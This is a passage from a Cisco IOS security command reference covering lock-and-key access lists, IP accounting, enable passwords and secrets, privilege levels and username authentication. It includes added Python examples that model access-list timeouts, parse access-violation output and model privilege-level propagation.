      Other traffic filter commands are protocol-specific, and are therefore described in the appropriate protocol-specific chapters in the Cisco IOS command references. You should refer to these protocol-specific chapters to find detailed information about traffic filter commands for each protocol. (Many of these protocols refer to the filters as "access lists.")
      Specific information about configuring traffic filters (access lists) for these protocols can be found in protocol-specific chapters in the Cisco IOS configuration guides. General guidelines for using access lists can be found in the "Configuring Traffic Filters" chapter of the Security Configuration Guide.
      Lock-and-key security is implemented with extended IP dynamic access lists. Lock-and-key security is available only for IP traffic, but provides more security functions than traditional static traffic filters.
      [12.7.4] access-enable
      To enable the router to create a temporary access list entry in a dynamic access list, use the access-enable EXEC command.
      access-enable [host] [timeout minutes]
      Syntax Description
      host (Optional) Tells the software to enable access only for the host from which the Telnet session originated. If not specified, the software allows all hosts on the defined network to gain access. The dynamic access list contains the network mask to use for enabling the new network.
      timeout minutes (Optional) Specifies an idle timeout for the temporary access list entry. If the access list entry is not accessed within this period, it is automatically deleted and requires the user to authenticate again. The default is for the entries to remain permanently. We recommend that this value equal the idle timeout set for the WAN connection.
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      This command enables the lock-and-key access feature.
      You should always define either an idle timeout (with the timeout keyword in this command) or an absolute timeout (with the timeout keyword in the access-list command). Otherwise, the temporary access list entry will remain, even after the user terminates the session.
      Example
      The following example causes the software to create a temporary access list entry and tells the software to enable access only for the host from which the Telnet session originated. If the access list entry is not accessed within 2 minutes, it is deleted.
      autocommand access-enable host timeout 2
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      access-list (extended) †
      autocommand †
      [12.7.5] access-template
      To manually place a temporary access list entry on a router to which you are connected, use the access-template EXEC command.
      access-template [access-list-number | name] [dynamic-name] [source] [destination] [timeout minutes]
      Syntax Description
      access-list-number Number of the dynamic access list.
      name Name of an IP access list. The name cannot contain a space or quotation mark, and must begin with an alphabetic character to avoid ambiguity with numbered access lists.
      dynamic-name (Optional) Name of a dynamic access list.
      source (Optional) Source address in a dynamic access list. The keywords host and any are allowed. All other attributes are inherited from the original access-list entry.
      destination (Optional) Destination address in a dynamic access list. The keywords host and any are allowed. All other attributes are inherited from the original access-list entry.
      timeout minutes (Optional) Specifies a maximum time limit for each entry within this dynamic list. This is an absolute time, from creation, that an entry can reside in the list. The default is an infinite time limit and allows an entry to remain permanently.
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      This command provides a way to enable the lock-and-key access feature.
      You should always define either an idle timeout (with the timeout keyword in this command) or an absolute timeout (with the timeout keyword in the access-list command). Otherwise, the dynamic access list will remain, even after the user has terminated the session.
      Example
      In the following example, the software enables IP access on incoming packets in which the source address is 172.29.1.129 and the destination address is 192.168.52.12. All other source and destination pairs are discarded.
      access-template 101 payroll host 172.29.1.129 host 192.168.52.12 timeout 2
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      access-list (extended) †
      autocommand †
      clear access-template
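      The idle timeout (access-enable) and absolute timeout (access-list dynamic / access-template) described above behave differently, and the usage guidelines warn that an entry with neither stays forever. The following added model, not part of the MH DeskReference or of Cisco IOS, plays out all three cases; class and function names (DynamicAcl, TempEntry, lingering_entries) are this example's own, and times are minutes from an arbitrary start.

```python
"""Model of a lock-and-key temporary access list entry and its two timeouts.

Added example, not from the MH DeskReference or Cisco IOS. Only the timeout
behaviour described in the access-enable / access-template sections is
modelled; the Telnet session that triggers access-enable is not.
"""
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class TempEntry:
    source: str
    destination: str
    created: float
    idle_timeout: Optional[float] = None      # access-enable ... timeout (minutes)
    absolute_timeout: Optional[float] = None  # access-list dynamic / access-template timeout
    last_hit: float = field(init=False)

    def __post_init__(self) -> None:
        self.last_hit = self.created

    def hit(self, now: float) -> None:
        """A packet matched the entry; only the idle clock is reset."""
        self.last_hit = now

    def expired(self, now: float) -> bool:
        # Absolute timeout counts from creation regardless of traffic.
        if self.absolute_timeout is not None and now - self.created >= self.absolute_timeout:
            return True
        # Idle timeout counts from the last matching packet.
        if self.idle_timeout is not None and now - self.last_hit >= self.idle_timeout:
            return True
        return False


class DynamicAcl:
    """A named dynamic access list holding temporary entries."""

    def __init__(self, name: str) -> None:
        self.name = name
        self.entries: List[TempEntry] = []

    def access_enable(self, source: str, destination: str, now: float,
                      idle_timeout: Optional[float] = None,
                      absolute_timeout: Optional[float] = None) -> TempEntry:
        """Create the temporary entry, as access-enable / access-template do."""
        entry = TempEntry(source, destination, now, idle_timeout, absolute_timeout)
        self.entries.append(entry)
        return entry

    def clear_access_template(self, source: Optional[str] = None) -> int:
        """Manual removal, as clear access-template does; returns the count removed."""
        before = len(self.entries)
        if source is None:
            self.entries = []
        else:
            self.entries = [e for e in self.entries if e.source != source]
        return before - len(self.entries)

    def expire(self, now: float) -> int:
        """Drop entries whose idle or absolute timeout has passed."""
        self.entries = [e for e in self.entries if not e.expired(now)]
        return len(self.entries)

    def permits(self, source: str, destination: str, now: float) -> bool:
        """Would a packet from source to destination pass at time now?"""
        self.expire(now)
        for e in self.entries:
            if e.source == source and e.destination == destination:
                e.hit(now)
                return True
        return False


def lingering_entries(acl: DynamicAcl, session_ended_at: float, now: float) -> List[TempEntry]:
    """Entries still present after the user's session ended: the case the
    usage guidelines warn about when no timeout of either kind is configured."""
    acl.expire(now)
    return [e for e in acl.entries if e.created <= session_ended_at]
```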
      [12.7.6] clear access-template
      To manually clear a temporary access list entry from a dynamic access list, use the clear access-template EXEC command.
      clear access-template [access-list-number | name] [dynamic-name] [source] [destination]
      Syntax Description
      access-list-number (Optional) Number of the dynamic access list from which the entry is to be deleted.
      name Name of an IP access list from which the entry is to be deleted. The name cannot contain a space or quotation mark, and must begin with an alphabetic character to avoid ambiguity with numbered access lists.
      dynamic-name (Optional) Name of the dynamic access list from which the entry is to be deleted.
      source (Optional) Source address in a temporary access list entry to be deleted.
      destination (Optional) Destination address in a temporary access list entry to be deleted.
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      This command is related to the lock-and-key access feature. It clears any temporary access list entries that match the parameters you define.
      Example
      The following example clears any temporary access list entries with a source of 172.20.1.12 from the dynamic access list named vendor:
      clear access-template vendor 172.20.1.12
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      access-list (extended) †
      access-template
      [12.7.7] show ip accounting
      To display the active accounting or checkpointed database or to display access-list violations, use the show ip accounting privileged EXEC command.
      show ip accounting [checkpoint] [output-packets | access-violations]
      Syntax Description
      checkpoint (Optional) Indicates that the checkpointed database should be displayed.
      output-packets (Optional) Indicates that information pertaining to packets that passed access control and were successfully routed should be displayed. This is the default value if neither output-packets nor access-violations is specified.
      access-violations (Optional) Indicates that information pertaining to packets that failed access lists and were not routed should be displayed.
      Defaults
      If neither the output-packets nor access-violations keyword is specified, show ip accounting displays information pertaining to packets that passed access control and were successfully routed.
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      To use this command, you must first enable IP accounting on a per-interface basis.
      Sample Displays
      Following is sample output from the show ip accounting command:
      Router# show ip accounting
      Source Destination Packets Bytes
      172.30.19.40 172.30.67.20 7 306
      172.30.13.55 172.30.67.20 67 2749
      172.30.2.50 172.30.33.51 17 1111
      172.30.2.50 172.30.2.1 5 319
      172.30.2.50 172.30.1.2 463 30991
      172.30.19.40 172.30.2.1 4 262
      172.30.19.40 172.30.1.2 28 2552
      172.30.20.2 172.30.6.100 39 2184
      172.30.13.55 172.30.1.2 35 3020
      172.30.19.40 172.30.33.51 1986 95091
      172.30.2.50 172.30.67.20 233 14908
      172.30.13.28 172.30.67.53 390 24817
      172.30.13.55 172.30.33.51 214669 9806659
      172.30.13.111 172.30.6.23 27739 1126607
      172.30.13.44 172.30.33.51 35412 1523980
      172.30.7.21 172.30.1.2 11 824
      172.30.13.28 172.30.33.2 21 1762
      172.30.2.166 172.30.7.130 797 141054
      172.30.3.11 172.30.67.53 4 246
      172.30.7.21 172.30.33.51 15696 695635
      172.30.7.24 172.30.67.20 21 916
      172.30.13.111 172.30.10.1 16 1137
      Field Description
      Source Source address of the packet
      Destination Destination address of the packet
      Packets Number of packets transmitted from the source address to the destination address
      Bytes Number of bytes transmitted from the source address to the destination address
      Following is sample output from the show ip accounting access-violations command. (The following displays information pertaining to packets that failed access lists and were not routed.)
      Router# show ip accounting access-violations
      Source Destination Packets Bytes ACL
      172.30.19.40 172.30.67.20 7 306 77
      172.30.13.55 172.30.67.20 67 2749 185
      172.30.2.50 172.30.33.51 17 1111 140
      172.30.2.50 172.30.2.1 5 319 140
      172.30.19.40 172.30.2.1 4 262 77
      Accounting data age is 41
      Field Description
      Source Source address of the packet
      Destination Destination address of the packet
      Packets For accounting keyword, number of packets transmitted from the source address to the destination address
      For access-violations keyword, number of packets transmitted from the source address to the destination address that violated the access control list
      Bytes For accounting keyword, number of bytes transmitted from the source address to the destination address
      For access-violations keyword, number of bytes transmitted from the source address to the destination address that violated the access-control list
      ACL Number of the access list of the last packet transmitted from the source to the destination that failed an access list
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      clear ip accounting †
      ip accounting †
      ip accounting-list †
      ip accounting-threshold †
      ip accounting-transits †
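      The access-violations display above is the raw material for spotting which sources keep hitting a deny entry. The following added parser, not part of the MH DeskReference or Cisco IOS, reads that output (the sample embedded here is the one shown in this section), aggregates denied packets per source and per ACL, and flags sources over a threshold; the function names are this example's own.

```python
"""Parse 'show ip accounting access-violations' output and summarise denials.

Added example, not from the MH DeskReference or Cisco IOS. SAMPLE_OUTPUT is
the sample display printed in the show ip accounting section, including the
prompt line and the trailing "Accounting data age" line the parser must skip.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

SAMPLE_OUTPUT = """\
Router# show ip accounting access-violations
Source Destination Packets Bytes ACL
172.30.19.40 172.30.67.20 7 306 77
172.30.13.55 172.30.67.20 67 2749 185
172.30.2.50 172.30.33.51 17 1111 140
172.30.2.50 172.30.2.1 5 319 140
172.30.19.40 172.30.2.1 4 262 77
Accounting data age is 41
"""

# One data row: src dst packets bytes [acl]; the ACL column is absent in
# plain 'show ip accounting' output, so it is optional here.
_ROW = re.compile(
    r"^\s*(?P<src>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<packets>\d+)\s+(?P<bytes>\d+)(?:\s+(?P<acl>\d+))?\s*$"
)


@dataclass(frozen=True)
class Violation:
    source: str
    destination: str
    packets: int
    bytes: int
    acl: Optional[int]  # None when the output has no ACL column


def parse_accounting(text: str) -> List[Violation]:
    """Return the data rows; the prompt, header and footer lines are ignored."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if not m:
            continue
        rows.append(Violation(
            m["src"], m["dst"], int(m["packets"]), int(m["bytes"]),
            int(m["acl"]) if m["acl"] is not None else None))
    return rows


def denials_by_source(rows: List[Violation]) -> List[Tuple[str, int]]:
    """Denied packets per source address, largest first (ties by address)."""
    totals: Dict[str, int] = defaultdict(int)
    for r in rows:
        totals[r.source] += r.packets
    return sorted(totals.items(), key=lambda kv: (-kv[1], kv[0]))


def denials_by_acl(rows: List[Violation]) -> Dict[int, int]:
    """Denied packets per access list number."""
    totals: Dict[int, int] = defaultdict(int)
    for r in rows:
        if r.acl is not None:
            totals[r.acl] += r.packets
    return dict(totals)


def noisy_sources(rows: List[Violation], threshold: int) -> List[str]:
    """Sources whose denied-packet count reaches the threshold."""
    return [src for src, n in denials_by_source(rows) if n >= threshold]


if __name__ == "__main__":
    rows = parse_accounting(SAMPLE_OUTPUT)
    for src, n in denials_by_source(rows):
        print(f"{src:16} {n:6d} denied packets")
    print("per ACL:", denials_by_acl(rows))
    print("sources at or over 20:", noisy_sources(rows, 20))
```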
      [12.7.8] Terminal Access Security Commands
      This chapter describes the commands used to control access to the router.
      enable
      To log on to the router at a specified level, use the enable EXEC command.
      enable [level]
      Syntax Description
      level (Optional) Defines the privilege level that a user logs in to on the router.
      Default
      Level 15
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      Note The enable command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the privilege level command set.
      Example
      In the following example, the user is logging on to privilege level 5 on a router:
      enable 5
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      disable †
      privilege level (global)
      privilege level (line)
      [12.7.9] enable password
      Use the enable password global configuration command to set a local password to control access to various privilege levels. Use the no form of this command to remove the password requirement.
      enable password [level level] {password | encryption-type encrypted-password}
      no enable password [level level]
      Syntax Description
      level level (Optional) Level for which the password applies. You can specify up to 16 privilege levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this argument is not specified in the command or the no form of the command, the privilege level defaults to 15 (traditional enable privileges).
      password Password users type to enter enable mode.
      encryption-type (Optional) Cisco-proprietary algorithm used to encrypt the password. Currently the only encryption type available is 7. If you specify encryption-type, the next argument you supply must be an encrypted password (a password already encrypted by a Cisco router).
      encrypted-password Encrypted password you enter, copied from another router configuration.
      Default
      No password is defined. The default is level 15.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      Use this command with the level option to define a password for a specific privilege level. After you specify the level and the password, give the password to the users who need to access this level. Use the privilege level (global) configuration command to specify commands accessible at various levels.
      You will not ordinarily enter an encryption type. Typically you enter an encryption type only if you copy and paste into this command a password that has already been encrypted by a Cisco router.
      Caution If you specify an encryption type and then enter a cleartext password, you will not be able to reenter enable mode. You cannot recover a lost password that has been encrypted by any method.
      If the service password-encryption command is set, the encrypted form of the password you create with the enable password command is displayed when a show startup-config command is entered.
      You can enable or disable password encryption with the service password-encryption command.
      An enable password is defined as follows:
      • Must contain from 1 to 25 uppercase and lowercase alphanumeric characters.
      • Must not have a number as the first character.
      • Can have leading spaces, but they are ignored. However, intermediate and trailing spaces are recognized.
      • Can contain the question mark (?) character if you precede the question mark with the key combination Ctrl-V when you create the password; for example, to create the password abc?123, do the following:
      • Enter abc.
      • Type Ctrl-V.
      • Enter ?123.

      When the system prompts you to enter the enable password, you need not precede the question mark with the Ctrl-V; you can simply enter abc?123 at the password prompt.
      Examples
      In the following example, the password pswd2 is enabled for privilege level 2:
      enable password level 2 pswd2
      In the following example the encrypted password $1$i5Rkls3LoyxzS8t9, which has been copied from a router configuration file, is set for privilege level 2 using encryption type 7:
      enable password level 2 7 $1$i5Rkls3LoyxzS8t9
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      disable †
      enable †
      enable secret
      privilege level (global)
      service password-encryption
      show privilege
      show startup-config †
      [12.8.0] enable secret
      Use the enable secret global configuration command to specify an additional layer of security over the enable password command. Use the no form of the command to turn off the enable secret function.
      enable secret [level level] {password | encryption-type encrypted-password}
      no enable secret [level level]
      Syntax Description
      level level (Optional) Level for which the password applies. You can specify up to sixteen privilege levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this argument is not specified in the command or in the no form of the command, the privilege level defaults to 15 (traditional enable privileges).
      password Password users type to enter enable mode. This password should be different from the password created with the enable password command.
      encryption-type (Optional) Cisco-proprietary algorithm used to encrypt the password. Currently the only encryption type available for this command is 5. If you specify encryption-type, the next argument you supply must be an encrypted password (a password encrypted by a Cisco router).
      encrypted-password Encrypted password you enter, copied from another router configuration.
      Default
      No password is defined. The default level is 15.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.0.
      Use this command in conjunction with the enable password command to provide an additional layer of security over the enable password. The enable secret command provides better security by storing the enable secret password using a non-reversible cryptographic function. The added layer of security that this provides is useful in environments where the password crosses the network or is stored on a TFTP server.
      You will not ordinarily enter an encryption type. Typically you enter an encryption type only if you paste into this command an encrypted password that you copied from a router configuration file.
      Caution If you specify an encryption-type and then enter a cleartext password, you will not be able to reenter enable mode. You cannot recover a lost password that has been encrypted by any method.
      If you use the same password for the enable password and enable secret commands, you receive an error message warning that this practice is not recommended, but the password will be accepted. By using the same password, however, you undermine the additional security the enable secret command provides.
      Note After you set a password using enable secret command, a password set using the enable password command works only if the enable secret is disabled or an older version of Cisco IOS software is being used, such as when running an older rxboot image. Additionally, you cannot recover a lost password that has been encrypted by any method.
      If service password-encryption is set, the encrypted form of the password you create here is displayed when a show startup-config command is entered.
      You can enable or disable password encryption with the service password-encryption command.
      An enable password is defined as follows:
      • Must contain from 1 to 25 uppercase and lowercase alphanumeric characters
      • Must not have a number as the first character
      • Can have leading spaces, but they are ignored. However, intermediate and trailing spaces are recognized.
      • Can contain the question mark (?) character if you precede the question mark with the key combination Ctrl-V when you create the password; for example, to create the password abc?123, do the following:
      • Enter abc.
      • Type Ctrl-V.
      • Enter ?123.
      When the system prompts you to enter the enable password, you need not precede the question mark with the Ctrl-V; you can simply enter abc?123 at the password prompt.
      Examples
      The following example specifies the enable secret password of gobbledegook:
      enable secret gobbledegook
      After specifying an enable secret password, users must enter this password to gain access. Any passwords set through enable password will no longer work.
      Password: gobbledegook
      In the following example the encrypted password $1$FaD0$Xyti5Rkls3LoyxzS8, which has been copied from a router configuration file, is enabled for privilege level 2 using encryption type 5:
      enable secret level 2 5 $1$FaD0$Xyti5Rkls3LoyxzS8
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      enable †
      enable password
      [12.8.1] ip identd
      To enable identification support, use the ip identd global configuration command. Use the no form of this command to disable this feature.
      ip identd
      no ip identd
      Syntax Description
      This command has no arguments or keywords.
      Default
      Identification support is not enabled.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      The ip identd command returns accurate information about the host TCP port; however, no attempt is made to protect against unauthorized queries.
      Example
      In the following example, identification support is enabled:
      ip identd
      [12.8.2] login authentication
      To enable TACACS+ authentication for logins, use the login authentication line configuration command. Use the no form of this command to either disable TACACS+ authentication for logins or to return to the default.
      login authentication {default | list-name}
      no login authentication {default | list-name}
      Syntax Description
      default Uses the default list created with the aaa authentication login command.
      list-name Uses the indicated list created with the aaa authentication login command.
      Default
      Uses the default set with aaa authentication login.
      Command Mode
      Line configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.3.
      This command is a per-line command used with AAA that specifies the name of a list of TACACS+ authentication methods to try at login. If no list is specified, the default list is used (whether or not it is specified in the command line).
      Caution If you use a list-name value that was not configured with the aaa authentication login command, you will disable login on this line.
      Entering the no version of login authentication has the same effect as entering the command with the default argument.
      Before issuing this command, create a list of authentication processes by using the global configuration aaa authentication login command.
      Examples
      The following example specifies that the default AAA authentication is to be used on line 4:
      line 4
      login authentication default
      The following example specifies that the AAA authentication list called list1 is to be used on line 7:
      line 7
      login authentication list1
      Related Command
      aaa authentication login
      [12.8.3] privilege level (global)
      To set the privilege level for a command, use the privilege level global configuration command. Use the no form of this command to revert to default privileges for a given command.
      privilege mode level level command
      no privilege mode level level command
      Syntax Description
      mode Configuration mode. (See the alias command in the Configuration Fundamentals Command Reference for a description of mode.)
      level Privilege level associated with the specified command. You can specify up to sixteen privilege levels, using numbers 0 through 15.
      command Command to which privilege level is associated.
      Defaults
      Level 15 is the level of access permitted by the enable password.
      Level 1 is normal EXEC-mode user privileges.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.3.
      The description of the alias command, in the Configuration Fundamentals Command Reference, shows the options for the mode argument in the privilege level global configuration command.
      The password for a privilege level defined using the privilege level global configuration command is configured using the enable password command.
      Level 0 can be used to specify a more-limited subset of commands for specific users or lines. For example, you can allow user "guest" to use only the show users and exit commands.
      Note There are five commands associated with privilege level 0: disable, enable, exit, help, and logout. If you configure AAA authorization for a privilege level greater than 0, these five commands will not be included.
      When you set a command to a privilege level, all commands whose syntax is a subset of that command are also set to that level. For example, if you set the show ip route command to level 15, the show commands and show ip commands are automatically set to privilege level 15, unless you set them individually to different levels.
      Example
      The commands in the following example set the configure command to privilege level 14 and establish SecretPswd14 as the password users must enter to use level 14 commands.
      privilege exec level 14 configure
      enable secret level 14 SecretPswd14
      Related Commands
      enable password
      enable secret
      privilege level (line)
      [12.8.4] privilege level (line)
      To set the default privilege level for a line, use the privilege level line configuration command. Use the no form of this command to restore the default user privilege level to the line.
      privilege level level
      no privilege level
      Syntax Description
      level Privilege level associated with the specified line.
      Defaults
      Level 15 is the level of access permitted by the enable password.
      Level 1 is normal EXEC-mode user privileges.
      Command Mode
      Line configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.3.
      Users can override the privilege level you set using this command by logging in to the line and enabling a different privilege level. They can lower the privilege level by using the disable command. If users know the password to a higher privilege level, they can use that password to enable the higher privilege level.
      You can use level 0 to specify a subset of commands for specific users or lines. For example, you can allow user "guest" to use only the show users and exit commands.
      You might specify a high level of privilege for your console line to restrict who uses the line.
      Examples
      The commands in the following example configure the auxiliary line for privilege level 5. Anyone using the auxiliary line has privilege level 5 by default.
      line aux 0
      privilege level 5
      The command in the following example sets all show ip commands, which includes all show commands, to privilege level 7:
      privilege exec level 7 show ip route
      This is equivalent to the following command:
      privilege exec level 7 show
      The commands in the following example set show ip route to level 7 and the show and show ip commands to level 1:
      privilege exec level 7 show ip route
      privilege exec level 1 show ip
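      The subset rule stated under privilege level (global) and worked through in the three examples above is easy to get wrong when reviewing a configuration. The following added model, not part of the MH DeskReference or of Cisco IOS, implements only that rule (a command's level propagates to every prefix not set individually, and a user needs the level of the command and of each prefix) and reproduces the page's examples; PrivilegeTable and its methods are this example's own names, and treating unconfigured commands as level 1 is an assumption.

```python
"""Model of how IOS privilege levels propagate to prefix commands.

Added example, not from the MH DeskReference or Cisco IOS. It implements the
rule stated in the privilege level sections: setting a command to a level also
sets every shorter command whose syntax is a prefix of it, unless that shorter
command was set individually; the effective level of a command is the highest
level along its prefix chain.
"""
from typing import Dict, Optional, Tuple

Cmd = Tuple[str, ...]


class PrivilegeTable:
    """Per-mode table of configured privilege levels."""

    def __init__(self, default_level: int = 1) -> None:
        # Assumption: commands with no configured level count as level 1,
        # which the page gives as normal EXEC-mode user privileges.
        self.default_level = default_level
        self._explicit: Dict[Tuple[str, Cmd], int] = {}  # set by its own privilege command
        self._implicit: Dict[Tuple[str, Cmd], int] = {}  # inherited from a longer command

    @staticmethod
    def _split(command: str) -> Cmd:
        return tuple(command.split())

    def set_level(self, mode: str, level: int, command: str) -> None:
        """privilege <mode> level <level> <command>"""
        if not 0 <= level <= 15:
            raise ValueError("privilege levels run from 0 through 15")
        words = self._split(command)
        if not words:
            raise ValueError("a command is required")
        self._explicit[(mode, words)] = level
        self._implicit.pop((mode, words), None)
        # Every proper prefix follows, unless it was set individually.
        for n in range(1, len(words)):
            prefix = (mode, words[:n])
            if prefix not in self._explicit:
                self._implicit[prefix] = level

    def unset(self, mode: str, command: str) -> None:
        """no privilege <mode> level <level> <command>: drop the individual setting."""
        self._explicit.pop((mode, self._split(command)), None)

    def _configured(self, mode: str, words: Cmd) -> Optional[int]:
        key = (mode, words)
        if key in self._explicit:
            return self._explicit[key]
        return self._implicit.get(key)

    def level_of(self, mode: str, command: str) -> int:
        """Effective level: the highest configured level of the command or any
        prefix of it, so a level set on 'show' governs every show command."""
        words = self._split(command)
        levels = [self._configured(mode, words[:n]) for n in range(1, len(words) + 1)]
        found = [lv for lv in levels if lv is not None]
        return max(found) if found else self.default_level

    def can_run(self, user_level: int, mode: str, command: str) -> bool:
        """A user may run a command whose effective level is at or below theirs."""
        return user_level >= self.level_of(mode, command)


if __name__ == "__main__":
    t = PrivilegeTable()
    t.set_level("exec", 7, "show ip route")
    t.set_level("exec", 1, "show ip")
    for cmd in ("show", "show ip", "show ip route", "show ip interface"):
        print(f"{cmd:18} level {t.level_of('exec', cmd)}")
```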
      Related Commands
      enable password
      privilege level (line)
      [12.8.5] service password-encryption
      To encrypt passwords, use the service password-encryption global configuration command. Use the no form of this command to disable this service.
      service password-encryption
      no service password-encryption
      Syntax Description
      This command has no arguments or keywords.
      Default
      No encryption
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The actual encryption process occurs when the current configuration is written or when a password is configured. Password encryption is applied to all passwords, including authentication key passwords, the privileged command password, console and virtual terminal line access passwords, and BGP neighbor passwords. This command is primarily useful for keeping unauthorized individuals from viewing your password in your configuration file.
      When password encryption is enabled, the encrypted form of the passwords is displayed when a show startup-config command is entered.
      Caution This command does not provide a high level of network security. If you use this command, you should also take additional network security measures.
      Note You cannot recover a lost encrypted password. You must clear NVRAM and set a new password.
      Example
      The following example causes password encryption to take place:
      service password-encryption
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      enable password
      key-string †
      neighbor password †
      [12.8.6] show privilege
      To display your current level of privilege, use the show privilege EXEC command.
      show privilege
      Syntax Description
      This command has no arguments or keywords.
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.3.
      Sample Display
      The following is sample output from the show privilege command. The current privilege level is 15.
      Router# show privilege
      Current privilege level is 15
      Related Commands
      enable password level
      enable secret level
      [12.8.7] username
      To establish a username-based authentication system, enter the username global configuration command.
      username name {nopassword | password password [encryption-type encrypted-password]}
      username name password secret
      username name [access-class number]
      username name [autocommand command]
      username name [callback-dialstring telephone-number]
      username name [callback-rotary rotary-group-number]
      username name [callback-line [tty] line-number [ending-line-number]]
      username name [nocallback-verify]
      username name [noescape] [nohangup]
      username name [privilege level]
      Syntax Description
      name Host name, server name, user ID, or command name. The name argument can be only one word. White spaces and quotation marks are not allowed.
      nopassword No password is required for this user to log in. This is usually most useful in combination with the autocommand keyword.
      password Specifies a possibly encrypted password for this username.
      password Password a user enters.
      encryption-type (Optional) Single-digit number that defines whether the text immediately following is encrypted, and, if so, what type of encryption is used. Currently defined encryption types are 0, which means that the text immediately following is not encrypted, and 7, which means that the text is encrypted using a Cisco-defined encryption algorithm.
      encrypted-password Encrypted password a user enters.
      password (Optional) Password to access the name argument. A password must be from 1 to 25 characters, can contain embedded spaces, and must be the last option specified in the username command.
      secret For CHAP authentication: specifies the secret for the local router or the remote device. The secret is encrypted when it is stored on the local router. The secret can consist of any string of up to 11 ASCII characters. There is no limit to the number of username and password combinations that can be specified, allowing any number of remote devices to be authenticated.
      access-class (Optional) Specifies an outgoing access list that overrides the access list specified in the access-class line configuration command. It is used for the duration of the user's session.
      number Access list number.
      autocommand (Optional) Causes the specified command to be issued automatically after the user logs in. When the command is complete, the session is terminated. Because the command can be any length and contain embedded spaces, commands using the autocommand keyword must be the last option on the line.
      command The command string. Because the command can be any length and contain embedded spaces, commands using the autocommand keyword must be the last option on the line.
      callback-dialstring (Optional) For asynchronous callback only: permits you to specify a telephone number to pass to the DCE device.
      telephone-number For asynchronous callback only: telephone number to pass to the DCE device.
      callback-rotary (Optional) For asynchronous callback only: permits you to specify a rotary group number. The next available line in the rotary group is selected.
      rotary-group-number For asynchronous callback only: integer between 1 and 100 that identifies the group of lines on which you want to enable a specific username for callback.
      callback-line (Optional) For asynchronous callback only: specific line on which you enable a specific username for callback.
      tty (Optional) For asynchronous callback only: standard asynchronous line.
      line-number For asynchronous callback only: relative number of the terminal line (or the first line in a contiguous group) on which you want to enable a specific username for callback. Numbering begins with zero.
      ending-line-number (Optional) Relative number of the last line in a contiguous group on which you want to enable a specific username for callback. If you omit the keyword (such as tty), then line-number and ending-line-number are absolute rather than relative line numbers.
      nocallback-verify (Optional) Authentication not required for EXEC callback on the specified line.
      noescape (Optional) Prevents a user from using an escape character on the host to which that user is connected.
      nohangup (Optional) Prevents the security server from disconnecting the user after an automatic command (set up with the autocommand keyword) has completed. Instead, the user gets another login prompt.
      privilege (Optional) Sets the privilege level for the user.
      level (Optional) Number between 0 and 15 that specifies the privilege level for the user.
      Default
      None
      Command Mode
      Global configuration
      Usage Guidelines
      The following commands first appeared in Cisco IOS Release 10.0:
      username name {nopassword | password password [encryption-type encrypted-password]}
      username name password secret
      username name [access-class number]
      username name [autocommand command]
      username name [noescape] [nohangup]
      username name [privilege level]
      The following commands first appeared in Cisco IOS Release 11.1:
      username name [callback-dialstring telephone-number]
      username name [callback-rotary rotary-group-number]
      username name [callback-line [tty] line-number [ending-line-number]]
      username name [nocallback-verify]
      The username command provides username and/or password authentication for login purposes only. (Note that it does not provide username and/or password authentication for enable mode when the enable use-tacacs command is also configured.)
      Multiple username commands can be used to specify options for a single user.
      Add a username entry for each remote system that the local router communicates with and requires authentication from. The remote device must have a username entry for the local router. This entry must have the same password as the local router's entry for that remote device.
      This command can be useful for defining usernames that get special treatment. For example, you can use this command to define an "info" username that does not require a password, but connects the user to a general purpose information service.
      The username command is required as part of the configuration for the Challenge Handshake Authentication Protocol (CHAP). Add a username entry for each remote system the local router requires authentication from.
      Note To enable the local router to respond to remote CHAP challenges, one username name entry must be the same as the hostname name entry that has already been assigned to your router.
      If there is no secret specified and the debug serial-interface command is enabled, an error is displayed when a link is established and the CHAP challenge is not implemented. CHAP debugging information is available using the debug serial-interface and debug serial-packet commands. For more information about debug commands, refer to the Debug Command Reference.
      Examples
      To implement a service similar to the UNIX who command, which can be entered at the login prompt and lists the current users of the router, the username command takes the following form:
      username who nopassword nohangup autocommand show users
      To implement an information service that does not require a password to be used, the command takes the following form:
      username info nopassword noescape autocommand telnet nic.ddn.mil
      To implement an ID that works even if the TACACS servers all break, the command takes the following form:
      username superuser password superpassword
      The following example configuration enables CHAP on interface serial 0. It also defines a password for the local server, Adam, and a remote server, Eve.
      hostname Adam
      interface serial 0
      encapsulation ppp
      ppp authentication chap
      username Adam password oursystem
      username Eve password theirsystem
